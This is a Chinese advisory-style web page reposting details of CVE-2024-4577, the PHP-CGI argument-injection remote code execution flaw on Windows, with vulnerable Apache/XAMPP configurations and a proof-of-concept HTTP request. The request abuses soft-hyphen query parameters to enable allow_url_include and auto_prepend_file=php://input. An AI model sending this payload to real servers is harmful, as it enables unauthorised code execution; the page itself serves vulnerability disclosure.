CVE-2024-4577｜PHP CGI Windows平台远程代码执行漏洞（POC）

爱谁谁

发布时间：2025-05-19 10:50:11

954人浏览过

来源于php中文网

原创

0x00 前言

PHP是Hypertext Preprocessor(超文本预处理器)的缩写，源自于“PHP/FI”的工程，在它的起源初期主要用于统计自己网站的访问者，后来用c语言进行了重新编写，拥有了自己的访问文件和数据库功能．在1995年发布了PHP 1．0第一个版本。

PHP是一种广泛使用的开源的脚本语言，它特别适合Web开发和嵌入HTML中，这种语言使用起来简单。

CGI、以CGI的方式运行，CGI英文叫做公共网关接口，就是Apache在遇到PHP脚本的时候会将PHP程序提交给CGI应用程序（php-cgi.exe）解释，解释之后的结果返回给Apache，然后再返回给相应的请求用户。

0x01 漏洞描述

立即学习“PHP免费学习笔记（深入）”；

0x02 CVE编号

CVE-2024-4577

0x03 影响版本

PHP 8.3

PHP 8.2

PHP 8.1

针对其他版本，PHP官方已不在维护，建议根据实际情况进行缓解措施。

情境一：

将PHP设定于CGI模式下执行

在Apache Httpd设定档中透过Action语法将对应的HTTP请求交给PHP-CGI执行档处理时，受此弱点影响，常见设定包含但不限于：

Copy Leaks

AI内容检测和分级，帮助创建和保护原创内容

下载

代码语言：javascript代码运行次数：0运行复制

AddHandler cgi-script .phpAction cgi-script“/cgi-bin/php-cgi.exe”

或

代码语言：javascript代码运行次数：0运行复制

SetHandler application/x-httpd-php-cgiAction application/x-httpd-php-cgi“/php-cgi/php-cgi.exe”

情境二：

将PHP执行档暴露在外（XAMPP预设安装设定）

即使未设定PHP于CGI模式下执行，仅将PHP执行档暴露在CGI目录下也受此弱点影响，常见情况包含但不限于：

将php.exe或php-cgi.exe复制到/cgi-bin/目录中

将PHP安装目录透过ScriptAlias暴露到外，如：

代码语言：javascript代码运行次数：0运行复制

ScriptAlias /php-cgi/“C:/xampp/php/”

0x04 漏洞详情

POC：

代码语言：javascript代码运行次数：0运行复制

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1Host: {{host}}User-Agent: curl/8.3.0Accept: */*Content-Length: 23Content-Type: application/x-www-form-urlencodedConnection: keep-alive

CVE-2024-4577｜PHP CGI Windows平台远程代码执行漏洞（POC）

执行命令：

(来源于网络)

0x05 参考链接

https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability/

本公众号的文章及工具仅提供学习参考，由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害，均由使用者本人负责,本公众号及文章作者不为此承担任何责任。

Windows错误代码0x00000022是什么问题_无效设备请求解析与修复

Win10如何设置闹钟 Win10时钟应用添加多时段提醒不漏重要事【方法】

Windows错误代码0x0000001E为什么出现_系统异常处理完整教程

Windows 11内存占用率过高怎么办_Windows 11排查内存泄漏和高占用进程

Windows 11 漏洞可能会降低 Intel Killer 网络的速度

PHP速学教程(入门到精通)

PHP怎么学习？PHP怎么入门？PHP在哪学？PHP怎么学才快？不用担心，这里为大家提供了PHP速学教程(入门到精通)，有需要的小伙伴保存下载就能学习啦！

下载

相关标签:

windows apache c语言处理器工具 php脚本 php c语言 JavaScript html 预处理器接口 CGI alert windows 数据库 apache http https

本站声明：本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

上一篇：Windows 10 Manager如何分割TXT文件？切割长篇TXT文件下一篇：7.5 Windows驱动开发：监控Register注册表回调

作者最新文章

苹果手机怎么用皮皮蟹_苹果皮皮蟹使用技巧【教程】

2026-01-18 09:01

Excel排名公式如何嵌套使用_Excel排名公式嵌套使用方法【进阶】

2026-01-18 09:02

美图秀秀网上年货节怎么P年礼照赢奖_美图秀秀年货节修图任务与奖品兑换【实操】

2026-01-18 09:05

番茄短剧怎样关注喜爱创作者_番茄短剧关注创作者法【追踪】

2026-01-18 09:06

二十四英寸等于多少厘米_二十四英寸等于60.96厘米显示算【家电】

2026-01-18 09:09

百度搜有红包活动页面卡顿咋解决百度搜有红包卡顿应对【技巧】

2026-01-18 09:15

支付宝怎样领全国消费券支付宝春节专项补贴领取路径【步骤】

2026-01-18 09:16

外星人卡死怎么关闭动态壁纸_外星人电脑卡死壁纸程序停用法【解析】

2026-01-18 09:18

崩坏星穹铁道爻光遗器搭配-崩坏星穹铁道爻光最强遗器搭配推荐

2026-01-18 09:21

PHP怎么检查环境是否可用_PHP检查环境是否可用检验【检测】

2026-01-18 09:21

热门AI工具

DeepSeek

幻方量化公司旗下的开源大模型平台

AI大模型

开放平台

豆包大模型

字节跳动自主研发的一系列大型语言模型

AI大模型

通义千问

阿里巴巴推出的全能AI助手

AI大模型

腾讯元宝

腾讯混元平台推出的AI助手

文档处理

Excel 表格

文心一言

文心一言是百度开发的AI聊天机器人，通过对话可以生成各种形式的内容。

AI大模型

中文写作

讯飞写作

基于讯飞星火大模型的AI写作工具，可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

中文写作

写作工具

即梦AI

一站式AI创作平台，免费AI图片和视频生成。

图片拼接

图画生成

ChatGPT

最最强大的AI聊天机器人程序，ChatGPT不单是聊天机器人，还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

AI大模型

中文写作

智谱清言 - 免费全能的AI助手

AI大模型

PDF 文档

相关专题

php文件怎么打开

打开php文件步骤：1、选择文本编辑器；2、在选择的文本编辑器中，创建一个新的文件，并将其保存为.php文件；3、在创建的PHP文件中，编写PHP代码；4、要在本地计算机上运行PHP文件，需要设置一个服务器环境；5、安装服务器环境后，需要将PHP文件放入服务器目录中；6、一旦将PHP文件放入服务器目录中，就可以通过浏览器来运行它。

2675

2023.09.01